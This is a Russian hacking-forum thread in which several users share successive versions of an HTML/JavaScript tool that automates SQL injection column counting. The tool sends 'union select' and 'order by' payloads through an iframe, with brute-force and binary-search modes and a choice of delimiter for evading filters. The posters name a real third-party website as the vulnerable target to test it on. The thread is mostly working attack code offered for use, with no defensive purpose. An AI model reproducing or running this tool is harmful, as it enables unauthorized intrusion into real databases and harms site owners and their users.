Форум АНТИЧАТ - Javascript-автоматизация поиска колич. колонок

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Javascript-автоматизация поиска колич. колонок (https://forum.antichat.xyz/showthread.php?t=46849)

Javascript-автоматизация поиска колич. колонок

Вот написал для себя (за пару часов) небольшой скриптик автоматизации sql-inj для определения колличества колонок. Я конечно понимаю, что дорабатывать его можно очень много, поэтому прошу строго не судить, тем более на javascript я кодер никакой

Цитата:

(выделил специально для inv, чтоб не стебался понапрасну. прим. автора)

, а предлагать усовершенствования и показать недостатки т.п. Главное он пашет! :D

Итак версия alpha 0.01

PHP код:


		
			
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />

<title>Подборщик колличества столбцов</title>

</head>



<script>

var url="http://";

var tek_url=url;

var s="";

var n=0;

function poisk(f) {

        tek_url=document.search.url.value;

        document.search.colum.value="?";

        document.search.tek_url.value=document.search.url.value+"-1+union+select+";

        tek_url=document.search.url.value+"-1+union+select+";

      

      while (n<50)

      {

      n++;

      if (n==1) {s=s+n;}

      else {s=s+","+n;}

      tek_url=tek_url+s+"/*";

      document.search.tek_url.value=tek_url;

      document.search.colum.value=n;      

      changePage(tek_url);

      pause ();

      

      }

}

function changePage(p) {

        document.getElementById( "ifrm" ).src = p;

     }









</script>

<form name=search method=post>

  <label>Ведите путь до уязвимого скрпта

  <input name="url" value="http://" size=160%>

  </label><br>

  <input onClick=poisk(search); type=button value="Подобрать число столбцов" name=calculateit>

  <input readonly size=5 name=colum><br>

  текущее значение<input name=tek_url size=180% readonly>

</form>

<body onload="changePage()">

    <iframe id="ifrm" src="" width="100%" height="500%"/>

  </body>



</html>

Затестить можно так:
Вводим путь до уязвимого скрипта:

Код:

http://sololiteratura.com/php/autor.php?id=

Жмякаем пимпу подобрать колличество столбцов, видим ошибку, жмякаем ещё, снова ошибка, ещё раз! Опс! Вот и наша скуля... :D число столбцов = 3.

Прошу разрешения автора использовать его код!
Просто у меня немного все автоматизированее получается - просто не обязательно указывать скрипт и параметр - мой скрипт выдирает со страницы все ссылки и брутит их...

Цитата:

Сообщение от biophreak

Ты сначала посмотри что он делает, он ведь не определяет саму скулю, а только вставляет колонки! Подобрал или нет ты оцениваешь чисто визуально, сам!

ЗЫ Используй на своё усмотрение код, я не против...

спасиба великий кодер =) /*не скрипт реально удобный*/

только если полей 50 или 30 то запаришься клацать :)
я лично определяю по ордер бай.. так намного быстрее

Цитата:

спасиба великий кодер

давай сразу в избранное

Цитата:

Сообщение от halkfild

Согласен, замечание стоящее. Надо имхо сделать и эти способом, так меньше придётся делать запросов, если использовать метод бинарного поиска... (пополам, потом ещё пополам и т.д.) ;)

ЗЫ Вручную полтинник вставлять вообще замахаешься...

сделал с бинарным поиском...
полностю не тестил.. пару штук проверил вроде все ок..
вообщем вводите адрес вместес параметром

Цитата:

http://sololiteratura.com/php/autor.php?id=1

клацаете меньше пока не появится контент.. потом мона больше пока не появится ошибка.. вообщем там просто

PHP код:


		
			
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 

<html xmlns="http://www.w3.org/1999/xhtml">

<META name="author" content="halkfild">

<META name="copyright" content="&copy; 2007 halkfild">  

 <style> 

  body 

  {  

   padding:10px;  

   background:#2A2E33;  

   font-family:tahoma, verdana, arial;  

   font-size:14px;  

   text-align:center;  

   color:#B9B9BD;  

  } 

  form 

  {  

   padding:10px; 

   border:1px solid #666;  

   width:700px;  

   margin:0 auto;  

  }

  iframe

  {  

   padding:10px; 

   border:1px solid #666;  

   width:700px;

   height:500px;  

   margin:0 auto;  

  } 

  input 

  {  

   vertical-align:middle;  

   margin:1px 0;  

   padding-right:10px;  

   border:1px solid #336600;

   padding:2px;  

   background:#363940;  

   color:#B9B9BD;  

  }  

  </style>  

<head> 

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> 

<title>Подборщик количества столбцов &copy; halkfild</title> 

</head> 



<script> 

var url="http://sololiteratura.com/php/autor.php?id=1"; //"http://"; 

var tek_url=url; 

var k=0;



var LL; //left limit

var RL; //right limit



 

function poisk(f) {

  tek_url=document.search.url.value;

  LL=document.search.llc.value*1;

  RL=document.search.rlc.value*1;

  rgurl= document.search.rurl.value;

  tek_url= tek_url + "+order+by+";

  

  if (f==1) { //>

  LL=LL+Math.floor((RL-LL)/2);



  }

  else {      //<

    RL=LL+Math.floor((RL-LL)/2);    

  }

  

  k=Math.floor(LL+(RL-LL)/2);

  tek_url= tek_url + k + rgurl;

  

  document.search.llc.value=LL;

  document.search.rlc.value=RL;

  document.search.tek_url.value=tek_url;

  changePage(tek_url);

} 

function changePage(p) { 

        document.getElementById( "ifrm" ).src = p; 

     } 







</script> 

<form name=search method=post> 

  <label>Ведите путь к уязвимому скрипту<br> 

  <input name="url" value="http://sololiteratura.com/php/autor.php?id=1" style='width:388px;'>

  <input name="rurl" value="/*&" style='width:200px;'>  

  </label><br> 

  <input onClick=poisk(1); type=button value="больше >" style='width:100px;'>

  <input onClick=poisk(2); type=button value="меньше <" style='width:100px;'>

  Границы поиска количества   

  <input size=5 name=llc value=0 style='width:96px;'><b>:</b><input size=5 name=rlc value=100 style='width:96px;'><br/> 

  адрессная строка(URL)<br/><input name=tek_url readonly style='width:600px;'><br/> 

</form> 

<body onload="changePage()"> <iframe id="ifrm" src="null"></body> 

</html>

з.ы. завтра нормально потестю..

*
[+] добавлена возможность использования правой части URL вида http://site.com/script.php?parametr=1[inj]&bla=bla&bla1=bla&bla2=bla

Ждите теперь сборку 2in1, halkfild обещал всё это дело слить в один флакон...

ну вот я и приехал.. :)
вот cделал все одним файлом. можно выбирать каким методом будет производится подбор

PHP код:


		
			


  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 

<html xmlns="http://www.w3.org/1999/xhtml">

<META name="author" content="halkfild, -=lebed=-">

<META name="copyright" content="&copy; 2007 halkfild">  

 <style> 

  body 

  {  

   padding:10px;  

   background:#2A2E33;  

   font-family:tahoma, verdana, arial;  

   font-size:14px;  

   text-align:center;  

   color:#B9B9BD;  

  } 

  form 

  {  

   padding:10px; 

   border:1px solid #666;  

   width:700px;  

   margin:0 auto;  

  }

  iframe

  {  

   padding:10px; 

   border:1px solid #666;  

   width:700px;

   height:500px;  

   margin:0 auto;  

  } 

  input 

  {  

   vertical-align:middle;  

   margin:1px 0;  

   padding-right:10px;  

   border:1px solid #336600;

   padding:2px;  

   background:#363940;  

   color:#B9B9BD;  

  }

  div 

  {  

  display:none;  

  }    

  </style>  

<head> 

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> 

<title>Подборщик количества столбцов &copy; halkfild & -=lebed=-</title> 

</head> 



<script> 

var url="http://sololiteratura.com/php/autor.php?id=1"; //"http://"; 

var tek_url=url; 

var k=0;



var LL; //left limit

var RL; //right limit



var s=""; 

var n=0; 



 

function b_search(f) {

  tek_url=document.binSearch.url.value;

  LL=document.binSearch.llc.value*1;

  RL=document.binSearch.rlc.value*1;

  rgurl= document.binSearch.rurl.value;

  tek_url= tek_url + "+order+by+";

  

  if (f==1) { //>

  LL=LL+Math.floor((RL-LL)/2);



  }

  else {      //<

    RL=LL+Math.floor((RL-LL)/2);    

  }

  

  k=Math.floor(LL+(RL-LL)/2);

  tek_url= tek_url + k + rgurl;

  

  document.binSearch.llc.value=LL;

  document.binSearch.rlc.value=RL;

  document.binSearch.tek_url.value=tek_url;

  changePage(tek_url);

}



function poisk(f) { 

        tek_url=document.bruteSearch.url.value; 

        document.bruteSearch.colum.value="?"; 

        document.bruteSearch.tek_url.value=document.bruteSearch.url.  value+"-1+union+select+"; 

        tek_url=document.bruteSearch.url.value+"-1+union+select+"; 

       

      while (n<50) 

      { 

      n++; 

      if (n==1) {s=s+n;} 

      else {s=s+","+n;} 

      tek_url=tek_url+s+"/*"; 

      document.bruteSearch.tek_url.value=tek_url; 

      document.bruteSearch.colum.value=n;       

      changePage(tek_url); 

      pause (); 

       

      } 

} 

 

function changePage(p) { 

  document.getElementById( "ifrm" ).src = p; 

     } 



function dShow(type){

  if (type==1) {

    document.getElementById( "brute" ).style.display='none'; 

    document.getElementById( "binary" ).style.display='inline';

  }

  else {

    document.getElementById( "binary" ).style.display='none';  

    document.getElementById( "brute" ).style.display='inline';

  }

}



</script>

<body onload="changePage()"> 

<label><b>JavaScript-подборщик количества полей</b></label><br/>

  <input type="radio" checked=1 name="type" onClick=dShow(1);>Binary search &copy; <b>halkfild</b>

  <input type="radio" name="type" onClick=dShow(2);>Bruteforce &copy; <b>-=lebed=-</b><br/>

  

<div id="binary" style='display:inline;'>

  <form name=binSearch method=post> 

    <label>Введите путь к уязвимому скрипту</label><br> 

    <input name="url" value="http://" style='width:388px;'>

    <input name="rurl" value="/*&" style='width:200px;'>  

    <br> 

    <input onClick=b_search(1); type=button value="больше >" style='width:100px;'>

    <input onClick=b_search(2); type=button value="меньше <" style='width:100px;'>

    Границы поиска количества   

    <input size=5 name=llc value=0 style='width:96px;'><b>:</b><input size=5 name=rlc value=100 style='width:96px;'><br/> 

    адрессная строка(URL)<br/><input name=tek_url readonly style='width:600px;'><br/> 

  </form> 

</div>



<div id="brute">

  <form name=bruteSearch method=post> 

    <label>Введите путь до уязвимого скрипта 

    <input name="url" value="http://" style='width:600px;'> 

    </label><br> 

    <input onClick=poisk(bruteSearch); type=button value="Подобрать число столбцов" name=calculateit> 

    <input readonly size=5 name=colum><br> 

    адрессная строка(URL)<input name=tek_url readonly style='width:600px;'> 

  </form>

</div>

   

<iframe id="ifrm" src="null"></body> 

</html>

cделаю наверное еще автоподстановку версии и тд. но это уже завтра

з.ы. если есть какие-то предложения или конструктивная критика пишите

версия 0.2.1

[~] исправлены недочеты в последовательном переборе
[+] добавлена возможность выбора разделителя ('+','/**/', ' ') /*зы за идею отдельное спасибо +toxa+*/

PHP код:


		
			


 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 

<html xmlns="http://www.w3.org/1999/xhtml">

<META name="author" content="halkfild, -=lebed=-">

<META name="copyright" content="&copy; 2007 halkfild">  

 <style> 

  body 

  {  

   padding:10px;  

   background:#2A2E33;  

   font-family:tahoma, verdana, arial;  

   font-size:14px;  

   text-align:center;  

   color:#B9B9BD;  

  } 

  form 

  {  

   padding:10px; 

   border:1px solid #666;  

   width:700px;  

   margin:0 auto;  

  }

  iframe

  {  

   padding:10px; 

   border:1px solid #666;  

   width:700px;

   height:500px;  

   margin:0 auto;  

  } 

  input 

  {  

   vertical-align:middle;  

   margin:1px 0;  

   padding-right:10px;  

   border:1px solid #336600;

   padding:2px;  

   background:#363940;  

   color:#B9B9BD;  

  }

  div 

  {  

  display:none;  

  }    

  </style>  

<head> 

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> 

<title>Подборщик количества столбцов &copy; halkfild & -=lebed=-</title> 

</head> 



<script> 

var url="http://sololiteratura.com/php/autor.php?id=1"; //"http://"; 

var tek_url=url; 

var k=0;



var LL; //left limit

var RL; //right limit



var s=""; 

var n=0; 



 

function b_search(f) {

  tek_url=document.binSearch.url.value;

  LL=document.binSearch.llc.value*1;

  RL=document.binSearch.rlc.value*1;

  rgurl= document.binSearch.rurl.value;

  var dlim = document.binSearch.delimiter.value;

  

  //tek_url= tek_url + "+order+by+";

  tek_url= tek_url + dlim+"order"+dlim+"by"+dlim;

  

  if (f==1) { //>

  LL=LL+Math.floor((RL-LL)/2);



  }

  else {      //<

    RL=LL+Math.floor((RL-LL)/2);    

  }

  

  k=Math.floor(LL+(RL-LL)/2);

  tek_url= tek_url + k + rgurl;

  

  document.binSearch.llc.value=LL;

  document.binSearch.rlc.value=RL;

  document.binSearch.tek_url.value=tek_url;

  changePage(tek_url);

}



function poisk(f) { 

        tek_url=document.bruteSearch.url.value; 

        document.bruteSearch.colum.value="?";

        

        var dlim = document.bruteSearch.delimiter.value;

         

        //document.bruteSearch.tek_url.value=document.bruteSearch.url.  value+"-1+union+select+"; 

        document.bruteSearch.tek_url.value=document.bruteSearch.url.value+"-1"+dlim+"union"+dlim+"select"+dlim;

        tek_url=document.bruteSearch.url.value+"-1"+dlim+"union"+dlim+"select"+dlim;

       

      while (n<50) 

      { 

      n++; 

      if (n==1) {s=s+n;} 

      else {s=s+","+n;} 

      tek_url=tek_url+s+"/*"; 

      document.bruteSearch.tek_url.value=tek_url; 

      document.bruteSearch.colum.value=n;       

      changePage(tek_url); 

      pause (); 

       

      } 

} 

 

function changePage(p) { 

  document.getElementById( "ifrm" ).src = p; 

     } 



function dShow(type){

  if (type==1) {

    document.getElementById( "brute" ).style.display='none'; 

    document.getElementById( "binary" ).style.display='inline';

  }

  else {

    document.getElementById( "binary" ).style.display='none';  

    document.getElementById( "brute" ).style.display='inline';

  }

}



</script>

<body onload="changePage()"> 

<label><b>JavaScript-подборщик количества полей</b></label><br/>

  <input type="radio" checked=1 name="type" onClick=dShow(1);> Binary search &copy; <b>halkfild</b>

  <input type="radio" name="type" onClick=dShow(2);> Bruteforce &copy; <b>-=lebed=-</b><br/>

  

<div id="binary" style='display:inline;'>

  <form name=binSearch method=post> 

    <label>Введите путь к уязвимому скрипту</label><br> 

    <input name="url" value="http://" style='width:388px;'>

    <input name="rurl" value="/*&" style='width:200px;'>  

    <br> 

    <input onClick=b_search(1); type=button value="больше >" style='width:100px;'>

    <input onClick=b_search(2); type=button value="меньше <" style='width:100px;'>

    Границы поиска количества   

    <input size=5 name=llc value=0 style='width:96px;'><b>:</b><input size=5 name=rlc value=100 style='width:96px;'><br/> 

    адрессная строка(URL)<br/><input name=tek_url readonly style='width:545px;'> <input name=delimiter style='width:45px;' value="+"><br/> 

  </form> 

</div>



<div id="brute">

  <form name=bruteSearch method=post> 

    <label>Введите путь до уязвимого скрипта</label><br/> 

    <input name="url" value="http://" style='width:388px;'>

    <input name="rurl" value="/*&" style='width:200px;'>  

    <br>

    Разделитель <input name=delimiter style='width:45px;' value="+">

    <input onClick=poisk(bruteSearch); type=button value="Подобрать число столбцов" name=calculateit style='width:255px;'> 

    Текущее количество <input readonly size=5 name=colum style='width:60px;'><br/> 

    адрессная строка(URL)<input name=tek_url readonly style='width:600px;'> 

  </form>

</div>

   

<iframe id="ifrm" src="null"></body> 

</html>